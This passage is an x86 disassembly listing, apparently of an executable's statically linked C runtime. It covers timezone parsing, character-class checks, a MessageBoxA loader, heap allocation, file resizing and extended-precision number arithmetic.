sub_41E97F proc near ; CODE XREF: sub_41C07B+F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_41E9CB
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_41E99D
test al, 80h
jz short loc_41E9CB
test al, 2
jnz short loc_41E9CB
loc_41E99D: ; CODE XREF: sub_41E97F+14�j
cmp dword ptr [esi+8], 0
jnz short loc_41E9AA
push esi
call sub_41D908
pop ecx
loc_41E9AA: ; CODE XREF: sub_41E97F+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_41E9BA
cmp dword ptr [esi+4], 0
jnz short loc_41E9CB
inc eax
mov [esi], eax
loc_41E9BA: ; CODE XREF: sub_41E97F+30�j
test byte ptr [esi+0Ch], 40h
jz short loc_41E9D1
dec dword ptr [esi]
mov eax, [esi]
cmp [eax], bl
jz short loc_41E9D7
inc eax
mov [esi], eax
loc_41E9CB: ; CODE XREF: sub_41E97F+9�j
; sub_41E97F+18�j ...
or eax, 0FFFFFFFFh
loc_41E9CE: ; CODE XREF: sub_41E97F+6C�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41E9D1: ; CODE XREF: sub_41E97F+3F�j
dec dword ptr [esi]
mov eax, [esi]
mov [eax], bl
loc_41E9D7: ; CODE XREF: sub_41E97F+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and al, 0EFh
or al, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_41E9CE
sub_41E97F endp
; =============== S U B R O U T I N E =======================================
sub_41E9ED proc near ; CODE XREF: sub_41C0B6:loc_41C0F5�p
cmp dword_46BDC8, 0
jnz short locret_41EA01
call sub_41EA02
inc dword_46BDC8
locret_41EA01: ; CODE XREF: sub_41E9ED+7�j
retn
sub_41E9ED endp
; =============== S U B R O U T I N E =======================================
sub_41EA02 proc near ; CODE XREF: sub_41E9ED+9�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
xor ebp, ebp
or ebx, 0FFFFFFFFh
push offset aTz ; "TZ"
xor edi, edi
mov dword_46BD10, ebp
mov dword_43AE68, ebx
mov dword_43AE58, ebx
call sub_41FCDD
mov esi, eax
pop ecx
cmp esi, ebp
jnz loc_41EB2B
push offset dword_46BD18
call dword_421158 ; GetTimeZoneInformation
cmp eax, ebx
jz loc_41EC5A
mov eax, dword_46BD18
mov ecx, dword_46BD6C
imul eax, 3Ch
cmp word_46BD5E, bp
push 1
pop edx
mov dword_43ADC0, eax
mov dword_46BD10, edx
jz short loc_41EA79
mov esi, ecx
imul esi, 3Ch
add eax, esi
mov dword_43ADC0, eax
loc_41EA79: ; CODE XREF: sub_41EA02+69�j
cmp word_46BDB2, bp
jz short loc_41EA9D
mov eax, dword_46BDC0
cmp eax, ebp
jz short loc_41EA9D
sub eax, ecx
mov dword_43ADC4, edx
imul eax, 3Ch
mov dword_43ADC8, eax
jmp short loc_41EAA9
; ---------------------------------------------------------------------------
loc_41EA9D: ; CODE XREF: sub_41EA02+7E�j
; sub_41EA02+87�j
mov dword_43ADC4, ebp
mov dword_43ADC8, ebp
loc_41EAA9: ; CODE XREF: sub_41EA02+99�j
lea eax, [esp+14h+var_4]
mov esi, dword_421138
push eax
push ebp
push 3Fh
mov edi, 220h
push off_43AE4C
push ebx
push offset dword_46BD1C
push edi
push dword_46BBAC
call esi ; WideCharToMultiByte
test eax, eax
jz short loc_41EAE6
cmp [esp+14h+var_4], ebp
jnz short loc_41EAE6
mov eax, off_43AE4C
and byte ptr [eax+3Fh], 0
jmp short loc_41EAEE
; ---------------------------------------------------------------------------
loc_41EAE6: ; CODE XREF: sub_41EA02+D1�j
; sub_41EA02+D7�j
mov eax, off_43AE4C
and byte ptr [eax], 0
loc_41EAEE: ; CODE XREF: sub_41EA02+E2�j
lea eax, [esp+14h+var_4]
push eax
push ebp
push 3Fh
push off_43AE50
push ebx
push offset dword_46BD70
push edi
push dword_46BBAC
call esi ; WideCharToMultiByte
test eax, eax
jz loc_41EC52
cmp [esp+14h+var_4], ebp
jnz loc_41EC52
mov eax, off_43AE50
and byte ptr [eax+3Fh], 0
jmp loc_41EC5A
; ---------------------------------------------------------------------------
loc_41EB2B: ; CODE XREF: sub_41EA02+2D�j
cmp byte ptr [esi], 0
jz loc_41EC5A
mov eax, dword_46BDC4
cmp eax, ebp
jz short loc_41EB4E
push eax
push esi
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_41EC5A
loc_41EB4E: ; CODE XREF: sub_41EA02+139�j
push dword_46BDC4
call sub_415C9B
push esi
call sub_415B10
inc eax
push eax
call sub_415BE9
add esp, 0Ch
cmp eax, ebp
mov dword_46BDC4, eax
jz loc_41EC5A
push esi
push eax
call sub_415A20
push 3
push esi
push off_43AE4C
call sub_416BE0
mov eax, off_43AE4C
add esi, 3
add esp, 14h
and byte ptr [eax+3], 0
cmp byte ptr [esi], 2Dh
jnz short loc_41EBA3
push 1
inc esi
pop edi
loc_41EBA3: ; CODE XREF: sub_41EA02+19B�j
push esi
call sub_4157F4
pop ecx
mov bl, 30h
mov ecx, eax
imul ecx, 0E10h
mov dword_43ADC0, ecx
loc_41EBBA: ; CODE XREF: sub_41EA02+1C7�j
mov al, [esi]
cmp al, 2Bh
jz short loc_41EBC8
cmp al, bl
jl short loc_41EBCB
cmp al, 39h
jg short loc_41EBCB
loc_41EBC8: ; CODE XREF: sub_41EA02+1BC�j
inc esi
jmp short loc_41EBBA
; ---------------------------------------------------------------------------
loc_41EBCB: ; CODE XREF: sub_41EA02+1C0�j
; sub_41EA02+1C4�j
cmp byte ptr [esi], 3Ah
jnz short loc_41EC1E
inc esi
push esi
call sub_4157F4
imul eax, 3Ch
pop ecx
mov ecx, dword_43ADC0
add ecx, eax
mov dword_43ADC0, ecx
loc_41EBE9: ; CODE XREF: sub_41EA02+1F2�j
mov al, [esi]
cmp al, bl
jl short loc_41EBF6
cmp al, 39h
jg short loc_41EBF6
inc esi
jmp short loc_41EBE9
; ---------------------------------------------------------------------------
loc_41EBF6: ; CODE XREF: sub_41EA02+1EB�j
; sub_41EA02+1EF�j
cmp byte ptr [esi], 3Ah
jnz short loc_41EC1E
inc esi
push esi
call sub_4157F4
pop ecx
mov ecx, dword_43ADC0
add ecx, eax
mov dword_43ADC0, ecx
loc_41EC11: ; CODE XREF: sub_41EA02+21A�j
mov al, [esi]
cmp al, bl
jl short loc_41EC1E
cmp al, 39h
jg short loc_41EC1E
inc esi
jmp short loc_41EC11
; ---------------------------------------------------------------------------
loc_41EC1E: ; CODE XREF: sub_41EA02+1CC�j
; sub_41EA02+1F7�j ...
cmp edi, ebp
jz short loc_41EC2A
neg ecx
mov dword_43ADC0, ecx
loc_41EC2A: ; CODE XREF: sub_41EA02+21E�j
movsx eax, byte ptr [esi]
cmp eax, ebp
mov dword_43ADC4, eax
jz short loc_41EC52
push 3
push esi
push off_43AE50
call sub_416BE0
mov eax, off_43AE50
add esp, 0Ch
and byte ptr [eax+3], 0
jmp short loc_41EC5A
; ---------------------------------------------------------------------------
loc_41EC52: ; CODE XREF: sub_41EA02+10B�j
; sub_41EA02+115�j ...
mov eax, off_43AE50
and byte ptr [eax], 0
loc_41EC5A: ; CODE XREF: sub_41EA02+40�j
; sub_41EA02+124�j ...
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_41EA02 endp
; =============== S U B R O U T I N E =======================================
sub_41EC60 proc near ; CODE XREF: sub_41C0B6+A5�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor edi, edi
cmp dword_43ADC4, edi
jnz short loc_41EC74
loc_41EC6D: ; CODE XREF: sub_41EC60+148�j
; sub_41EC60+150�j ...
xor eax, eax
jmp loc_41EDC0
; ---------------------------------------------------------------------------
loc_41EC74: ; CODE XREF: sub_41EC60+B�j
mov esi, [esp+0Ch+arg_0]
push 1
pop ebx
mov eax, [esi+14h]
cmp eax, dword_43AE58
jnz short loc_41EC92
cmp eax, dword_43AE68
jz loc_41ED94
loc_41EC92: ; CODE XREF: sub_41EC60+24�j
cmp dword_46BD10, edi
jz loc_41ED6A
movzx ecx, word_46BDBE
push ecx
cmp word_46BDB0, di
movzx ecx, word_46BDBC
push ecx
movzx ecx, word_46BDBA
push ecx
movzx ecx, word_46BDB8
push ecx
jnz short loc_41ECE4
movzx ecx, word_46BDB4
push edi
push ecx
movzx ecx, word_46BDB6
push ecx
movzx ecx, word_46BDB2
push ecx
push eax
push ebx
jmp short loc_41ECF8
; ---------------------------------------------------------------------------
loc_41ECE4: ; CODE XREF: sub_41EC60+65�j
movzx ecx, word_46BDB6
push ecx
push edi
movzx ecx, word_46BDB2
push edi
push ecx
push eax
push edi
loc_41ECF8: ; CODE XREF: sub_41EC60+82�j
push ebx
call sub_41EE0C
movzx eax, word_46BD6A
add esp, 2Ch
cmp word_46BD5C, di
push eax
movzx eax, word_46BD68
push eax
movzx eax, word_46BD66
push eax
movzx eax, word_46BD64
push eax
jnz short loc_41ED52
movzx eax, word_46BD60
push edi
push eax
movzx eax, word_46BD62
push eax
movzx eax, word_46BD5E
push eax
push dword ptr [esi+14h]
push ebx
loc_41ED47: ; CODE XREF: sub_41EC60+108�j
push edi
call sub_41EE0C
add esp, 2Ch
jmp short loc_41ED94
; ---------------------------------------------------------------------------
loc_41ED52: ; CODE XREF: sub_41EC60+C8�j
movzx eax, word_46BD62
push eax
push edi
movzx eax, word_46BD5E
push edi
push eax
push dword ptr [esi+14h]
push edi
jmp short loc_41ED47
; ---------------------------------------------------------------------------
loc_41ED6A: ; CODE XREF: sub_41EC60+38�j
push edi
push edi
push edi
push 2
push edi
push edi
push ebx
push 4
push eax
push ebx
push ebx
call sub_41EE0C
push edi
push edi
push edi
push 2
push edi
push edi
push 5
push 0Ah
push dword ptr [esi+14h]
push ebx
push edi
call sub_41EE0C
add esp, 58h
loc_41ED94: ; CODE XREF: sub_41EC60+2C�j
; sub_41EC60+F0�j
mov edx, dword_43AE5C
mov eax, dword_43AE6C
mov ecx, [esi+1Ch]
cmp edx, eax
jge short loc_41EDC4
cmp ecx, edx
jl loc_41EC6D
cmp ecx, eax
jg loc_41EC6D
cmp ecx, edx
jle short loc_41EDD8
cmp ecx, eax
jge short loc_41EDD8
loc_41EDBE: ; CODE XREF: sub_41EC60+166�j
; sub_41EC60+16A�j
mov eax, ebx
loc_41EDC0: ; CODE XREF: sub_41EC60+F�j
; sub_41EC60+19D�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41EDC4: ; CODE XREF: sub_41EC60+144�j
cmp ecx, eax
jl short loc_41EDBE
cmp ecx, edx
jg short loc_41EDBE
cmp ecx, eax
jle short loc_41EDD8
cmp ecx, edx
jl loc_41EC6D
loc_41EDD8: ; CODE XREF: sub_41EC60+158�j
; sub_41EC60+15C�j ...
mov eax, [esi+8]
imul eax, 3Ch
add eax, [esi+4]
imul eax, 3Ch
add eax, [esi]
imul eax, 3E8h
cmp ecx, edx
jnz short loc_41EDFF
xor ecx, ecx
cmp eax, dword_43AE60
setnl cl
loc_41EDFB: ; CODE XREF: sub_41EC60+1AA�j
mov eax, ecx
jmp short loc_41EDC0
; ---------------------------------------------------------------------------
loc_41EDFF: ; CODE XREF: sub_41EC60+18E�j
xor ecx, ecx
cmp eax, dword_43AE70
setl cl
jmp short loc_41EDFB
sub_41EC60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EE0C proc near ; CODE XREF: sub_41EC60+99�p
; sub_41EC60+E8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 1
push ebx
mov ebx, [ebp+arg_8]
push esi
jnz loc_41EEA7
mov eax, [ebp+arg_C]
mov [ebp+arg_8], ebx
and [ebp+arg_8], 3
mov esi, eax
jnz short loc_41EE37
shl esi, 2
mov eax, dword_43AE70[esi]
jmp short loc_41EE40
; ---------------------------------------------------------------------------
loc_41EE37: ; CODE XREF: sub_41EE0C+1E�j
shl esi, 2
mov eax, dword_43AEA4[esi]
loc_41EE40: ; CODE XREF: sub_41EE0C+29�j
mov edx, ebx
lea ecx, [eax+1]
imul edx, 16Dh
lea eax, [ebx-1]
push edi
sar eax, 2
mov edi, ecx
push 7
add edi, eax
lea eax, [edx+edi-63DBh]
pop edi
cdq
idiv edi
mov eax, [ebp+arg_10]
pop edi
cmp edx, [ebp+arg_14]
jg short loc_41EE7A
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
lea ecx, [ecx+eax-7]
jmp short loc_41EE84
; ---------------------------------------------------------------------------
loc_41EE7A: ; CODE XREF: sub_41EE0C+5E�j
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
add ecx, eax
loc_41EE84: ; CODE XREF: sub_41EE0C+6C�j
cmp [ebp+arg_10], 5
jnz short loc_41EEC2
cmp [ebp+arg_8], 0
jnz short loc_41EE98
mov esi, dword_43AE74[esi]
jmp short loc_41EE9E
; ---------------------------------------------------------------------------
loc_41EE98: ; CODE XREF: sub_41EE0C+82�j
mov esi, dword_43AEA8[esi]
loc_41EE9E: ; CODE XREF: sub_41EE0C+8A�j
cmp ecx, esi
jle short loc_41EEC2
sub ecx, 7
jmp short loc_41EEC2
; ---------------------------------------------------------------------------
loc_41EEA7: ; CODE XREF: sub_41EE0C+C�j
mov eax, [ebp+arg_C]
test bl, 3
jnz short loc_41EEB8
mov ecx, dword_43AE70[eax*4]
jmp short loc_41EEBF
; ---------------------------------------------------------------------------
loc_41EEB8: ; CODE XREF: sub_41EE0C+A1�j
mov ecx, dword_43AEA4[eax*4]
loc_41EEBF: ; CODE XREF: sub_41EE0C+AA�j
add ecx, [ebp+arg_18]
loc_41EEC2: ; CODE XREF: sub_41EE0C+7C�j
; sub_41EE0C+94�j ...
cmp [ebp+arg_0], 1
jnz short loc_41EEF3
mov eax, [ebp+arg_1C]
mov dword_43AE5C, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
mov dword_43AE58, ebx
imul eax, 3Ch
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword_43AE60, eax
jmp short loc_41EF48
; ---------------------------------------------------------------------------
loc_41EEF3: ; CODE XREF: sub_41EE0C+BA�j
mov eax, [ebp+arg_1C]
mov dword_43AE6C, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
imul eax, 3Ch
add eax, dword_43ADC8
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword_43AE70, eax
jns short loc_41EF2B
add eax, 5265C00h
dec ecx
mov dword_43AE70, eax
jmp short loc_41EF3C
; ---------------------------------------------------------------------------
loc_41EF2B: ; CODE XREF: sub_41EE0C+110�j
mov edx, 5265C00h
cmp eax, edx
jl short loc_41EF42
sub eax, edx
inc ecx
mov dword_43AE70, eax
loc_41EF3C: ; CODE XREF: sub_41EE0C+11D�j
mov dword_43AE6C, ecx
loc_41EF42: ; CODE XREF: sub_41EE0C+126�j
mov dword_43AE68, ebx
loc_41EF48: ; CODE XREF: sub_41EE0C+E5�j
pop esi
pop ebx
pop ebp
retn
sub_41EE0C endp
; =============== S U B R O U T I N E =======================================
sub_41EF4C proc near ; CODE XREF: sub_41D05F+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_41EF5D
add esp, 0Ch
retn
sub_41EF4C endp
; =============== S U B R O U T I N E =======================================
sub_41EF5D proc near ; CODE XREF: sub_41EF4C+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_46D041[eax], cl
jnz short loc_41EF8A
cmp [esp+arg_4], 0
jz short loc_41EF83
movzx eax, word_4383FA[eax*2]
and eax, [esp+arg_4]
jmp short loc_41EF85
; ---------------------------------------------------------------------------
loc_41EF83: ; CODE XREF: sub_41EF5D+16�j
xor eax, eax
loc_41EF85: ; CODE XREF: sub_41EF5D+24�j
test eax, eax
jnz short loc_41EF8A
retn
; ---------------------------------------------------------------------------
loc_41EF8A: ; CODE XREF: sub_41EF5D+F�j
; sub_41EF5D+2A�j
push 1
pop eax
retn
sub_41EF5D endp
; =============== S U B R O U T I N E =======================================
sub_41EF8E proc near ; CODE XREF: sub_41D7B5+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp dword_46BDCC, ebx
push esi
push edi
jnz short loc_41EFDD
push offset aUser32_dll ; "user32.dll"
call dword_4210C0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_41F013
mov esi, dword_4210C4
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_46BDCC, eax
jz short loc_41F013
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_46BDD0, eax
call esi ; GetProcAddress
mov dword_46BDD4, eax
loc_41EFDD: ; CODE XREF: sub_41EF8E+B�j
mov eax, dword_46BDD0
test eax, eax
jz short loc_41EFFC
call eax ; GetActiveWindow
mov ebx, eax
test ebx, ebx
jz short loc_41EFFC
mov eax, dword_46BDD4
test eax, eax
jz short loc_41EFFC
push ebx
call eax ; GetLastActivePopup
mov ebx, eax
loc_41EFFC: ; CODE XREF: sub_41EF8E+56�j
; sub_41EF8E+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call dword_46BDCC ; MessageBoxA
loc_41F00F: ; CODE XREF: sub_41EF8E+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41F013: ; CODE XREF: sub_41EF8E+1C�j
; sub_41EF8E+33�j
xor eax, eax
jmp short loc_41F00F
sub_41EF8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F017 proc near ; CODE XREF: sub_41D972+22�p
; sub_41D972+3B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
imul esi, [ebp+arg_4]
cmp esi, 0FFFFFFE0h
push edi
mov [ebp+arg_0], esi
ja short loc_41F038
test esi, esi
jnz short loc_41F032
push 1
pop esi
loc_41F032: ; CODE XREF: sub_41F017+16�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_41F038: ; CODE XREF: sub_41F017+12�j
; sub_41F017+94�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja short loc_41F097
mov eax, dword_46D168
cmp eax, 3
jnz short loc_41F063
mov eax, [ebp+arg_0]
cmp eax, dword_46D160
ja short loc_41F082
push eax
call sub_419011
mov edi, eax
pop ecx
test edi, edi
jnz short loc_41F0AD
jmp short loc_41F082
; ---------------------------------------------------------------------------
loc_41F063: ; CODE XREF: sub_41F017+30�j
cmp eax, 2
jnz short loc_41F082
cmp esi, dword_43A634
ja short loc_41F082
mov eax, esi
shr eax, 4
push eax
call sub_419AB4
mov edi, eax
pop ecx
test edi, edi
jnz short loc_41F0C1
loc_41F082: ; CODE XREF: sub_41F017+3B�j
; sub_41F017+4A�j ...
push esi
push 8
push dword_46D164
call dword_42114C ; RtlAllocateHeap
mov edi, eax
test edi, edi
jnz short loc_41F0BB
loc_41F097: ; CODE XREF: sub_41F017+26�j
cmp dword_46BB64, 0
jz short loc_41F0BB
push esi
call sub_418A88
test eax, eax
pop ecx
jz short loc_41F0C4
jmp short loc_41F038
; ---------------------------------------------------------------------------
loc_41F0AD: ; CODE XREF: sub_41F017+48�j
push [ebp+arg_0]
loc_41F0B0: ; CODE XREF: sub_41F017+AB�j
push 0
push edi
call sub_415390
add esp, 0Ch
loc_41F0BB: ; CODE XREF: sub_41F017+7E�j
; sub_41F017+87�j
mov eax, edi
loc_41F0BD: ; CODE XREF: sub_41F017+AF�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41F0C1: ; CODE XREF: sub_41F017+69�j
push esi
jmp short loc_41F0B0
; ---------------------------------------------------------------------------
loc_41F0C4: ; CODE XREF: sub_41F017+92�j
xor eax, eax
jmp short loc_41F0BD
sub_41F017 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41DA17
loc_41F0C8: ; CODE XREF: sub_41DA17+E�j
push esi
push edi
push 3
xor edi, edi
pop esi
cmp dword_46CE00, esi
jle short loc_41F11B
loc_41F0D7: ; CODE XREF: sub_41DA17+1702�j
mov eax, dword_46BDF8
mov eax, [eax+esi*4]
test eax, eax
jz short loc_41F112
test byte ptr [eax+0Ch], 83h
jz short loc_41F0F6
push eax
call sub_415960
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41F0F6
inc edi
loc_41F0F6: ; CODE XREF: sub_41DA17+16D0�j
; sub_41DA17+16DC�j
cmp esi, 14h
jl short loc_41F112
mov eax, dword_46BDF8
push dword ptr [eax+esi*4]
call sub_415C9B
mov eax, dword_46BDF8
pop ecx
and dword ptr [eax+esi*4], 0
loc_41F112: ; CODE XREF: sub_41DA17+16CA�j
; sub_41DA17+16E2�j
inc esi
cmp esi, dword_46CE00
jl short loc_41F0D7
loc_41F11B: ; CODE XREF: sub_41DA17+16BE�j
mov eax, edi
pop edi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_41DA17
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F120 proc near ; CODE XREF: sub_41DDF6+271�p
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_415B90
push ebx
mov ebx, [ebp+arg_0]
push esi
xor esi, esi
cmp ebx, dword_46CF20
jnb loc_41F255
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, dword_46CE20[eax*4]
test byte ptr [eax+ecx*8+4], 1
jz loc_41F255
push 1
push esi
push ebx
call sub_41C447
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_41F25F
push 2
push esi
push ebx
call sub_41C447
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_41F25F
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_41F202
push 1000h
lea eax, [ebp+var_1000]
push esi
push eax
call sub_415390
push 8000h
push ebx
call sub_41FD5A
add esp, 14h
mov [ebp+arg_4], eax
loc_41F1B6: ; CODE XREF: sub_41F120+BD�j
mov eax, 1000h
cmp edi, eax
jge short loc_41F1C1
mov eax, edi
loc_41F1C1: ; CODE XREF: sub_41F120+9D�j
push eax
lea eax, [ebp+var_1000]
push eax
push ebx
call sub_41CCC7
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_41F1DF
sub edi, eax
test edi, edi
jle short loc_41F1F5
jmp short loc_41F1B6
; ---------------------------------------------------------------------------
loc_41F1DF: ; CODE XREF: sub_41F120+B5�j
cmp dword_46BB08, 5
jnz short loc_41F1F2
mov dword_46BB04, 0Dh
loc_41F1F2: ; CODE XREF: sub_41F120+C6�j
or esi, 0FFFFFFFFh
loc_41F1F5: ; CODE XREF: sub_41F120+BB�j
push [ebp+arg_4]
push ebx
call sub_41FD5A
pop ecx
pop ecx
jmp short loc_41F242
; ---------------------------------------------------------------------------
loc_41F202: ; CODE XREF: sub_41F120+71�j
jge short loc_41F242
push 0
push [ebp+arg_4]
push ebx
call sub_41C447
push ebx
call sub_41DD62
add esp, 10h
push eax
call dword_421010 ; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, 0FFFFFFFFh
jnz short loc_41F242
mov dword_46BB04, 0Dh
call dword_421088 ; RtlGetLastWin32Error
mov dword_46BB08, eax
loc_41F242: ; CODE XREF: sub_41F120+E0�j
; sub_41F120:loc_41F202�j ...
push 0
push [ebp+arg_0]
push ebx
call sub_41C447
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_41F262
; ---------------------------------------------------------------------------
loc_41F255: ; CODE XREF: sub_41F120+1A�j
; sub_41F120+36�j
mov dword_46BB04, 9
loc_41F25F: ; CODE XREF: sub_41F120+4E�j
; sub_41F120+63�j
or eax, 0FFFFFFFFh
loc_41F262: ; CODE XREF: sub_41F120+133�j
pop esi
pop ebx
leave
retn
sub_41F120 endp
; =============== S U B R O U T I N E =======================================
sub_41F266 proc near ; CODE XREF: sub_41E261+2B�p
; sub_41E261+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
lea ecx, [edx+esi]
cmp ecx, edx
jb short loc_41F27C
cmp ecx, esi
jnb short loc_41F27F
loc_41F27C: ; CODE XREF: sub_41F266+10�j
push 1
pop eax
loc_41F27F: ; CODE XREF: sub_41F266+14�j
mov edx, [esp+4+arg_8]
pop esi
mov [edx], ecx
retn
sub_41F266 endp
; =============== S U B R O U T I N E =======================================
sub_41F287 proc near ; CODE XREF: sub_41F340+40�p
; sub_41F340+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_41F266
add esp, 0Ch
test eax, eax
jz short loc_41F2B9
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_41F266
add esp, 0Ch
test eax, eax
jz short loc_41F2B9
inc dword ptr [esi+8]
loc_41F2B9: ; CODE XREF: sub_41F287+19�j
; sub_41F287+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_41F266
add esp, 0Ch
test eax, eax
jz short loc_41F2D1
inc dword ptr [esi+8]
loc_41F2D1: ; CODE XREF: sub_41F287+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_41F266
add esp, 0Ch
pop edi
pop esi
retn
sub_41F287 endp
; =============== S U B R O U T I N E =======================================
sub_41F2E5 proc near ; CODE XREF: sub_41F340+30�p
; sub_41F340+36�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov esi, [eax]
mov edi, [eax+4]
mov ecx, esi
add esi, esi
mov [eax], esi
lea esi, [edi+edi]
shr ecx, 1Fh
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
mov [eax+4], esi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+8], ecx
pop esi
retn
sub_41F2E5 endp
; =============== S U B R O U T I N E =======================================
sub_41F313 proc near ; CODE XREF: sub_41F8D8+1C8�p
; sub_41FDD0+17D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov edx, [eax+8]
mov ecx, [eax+4]
mov esi, edx
mov edi, ecx
shl esi, 1Fh
shr ecx, 1
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
shr edx, 1
or ecx, edi
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_41F313 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F340 proc near ; CODE XREF: sub_41F407+3CA�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
cmp eax, edx
push esi
mov [ebp+var_4], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_41F3B4
push edi
mov [ebp+arg_8], eax
loc_41F367: ; CODE XREF: sub_41F340+6F�j
mov esi, ebx
lea edi, [ebp+var_10]
movsd
movsd
push ebx
movsd
call sub_41F2E5
push ebx
call sub_41F2E5
lea eax, [ebp+var_10]
push eax
push ebx
call sub_41F287
push ebx
call sub_41F2E5
mov eax, [ebp+arg_0]
and [ebp+var_C], 0
and [ebp+var_8], 0
movsx eax, byte ptr [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push ebx
call sub_41F287
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_41F367
xor edx, edx
pop edi
loc_41F3B4: ; CODE XREF: sub_41F340+21�j
; sub_41F340+9F�j
cmp [ebx+8], edx
jnz short loc_41F3E1
mov ecx, [ebx+4]
mov eax, ecx
shr eax, 10h
mov [ebx+8], eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
add [ebp+var_4], 0FFF0h
mov [ebx+4], esi
mov [ebx], eax
jmp short loc_41F3B4
; ---------------------------------------------------------------------------
loc_41F3E1: ; CODE XREF: sub_41F340+77�j
mov esi, 8000h
loc_41F3E6: ; CODE XREF: sub_41F340+B9�j
test [ebx+8], esi
jnz short loc_41F3FB
push ebx
call sub_41F2E5
add [ebp+var_4], 0FFFFh
pop ecx
jmp short loc_41F3E6
; ---------------------------------------------------------------------------
loc_41F3FB: ; CODE XREF: sub_41F340+A9�j
mov ax, word ptr [ebp+var_4]
pop esi
mov [ebx+0Ah], ax
